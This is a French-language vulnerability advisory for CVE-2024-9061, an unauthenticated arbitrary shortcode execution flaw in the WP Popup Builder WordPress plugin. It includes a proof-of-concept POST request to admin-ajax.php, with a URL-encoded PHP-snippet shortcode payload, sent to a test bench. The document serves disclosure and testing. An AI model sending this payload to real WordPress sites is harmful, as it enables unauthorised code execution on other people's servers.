
WP Popup Builder – Formulaires de popup et génération de prospects marketing <= 1.3.5 - Exécution arbitraire de shortcode non authentifiée via wp_ajax_nopriv_shortcode_Api_Add
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Exécution de shortcode arbitraire non authentifiée via wp_ajax_nopriv_shortcode_Api_Add
Le Le plugin WP Popup Builder – Popup Forms and Marketing Lead Generation pour WordPress est vulnérable à l'exécution de shortcode arbitraire via l'action AJAX wp_ajax_nopriv_shortcode_Api_Add dans toutes les versions jusqu'à la 1.3.5 incluse. Cela est dû au fait que le logiciel permet aux utilisateurs d'exécuter une action qui ne valide pas correctement une valeur avant d'exécuter do_shortcode. Cela permet à des attaquants non authentifiés d'exécuter des shortcodes arbitraires. NOTE : Cette vulnérabilité a été partiellement corrigée dans la version 1.3.5 avec une vérification nonce, ce qui a effectivement empêché l'accès à la fonction affectée. Cependant, la version 1.3.6 intègre la vérification d'autorisation correcte pour empêcher tout accès non autorisé.
J'avais un autre plugin installé pour l'exécution de php pour cela mais je n'ai jamais réussi à l'exécuter.
[xyz-ips snippet="test"]
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
La réponse est un 200 vierge